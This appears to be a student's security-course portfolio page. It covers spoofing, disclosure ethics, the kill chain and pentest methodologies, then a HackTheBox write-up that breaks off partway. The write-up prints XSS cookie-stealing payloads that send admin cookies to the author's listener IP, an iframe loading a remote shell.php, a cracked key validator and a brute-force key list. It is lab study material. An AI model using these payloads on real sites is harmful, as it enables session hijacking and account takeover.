          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
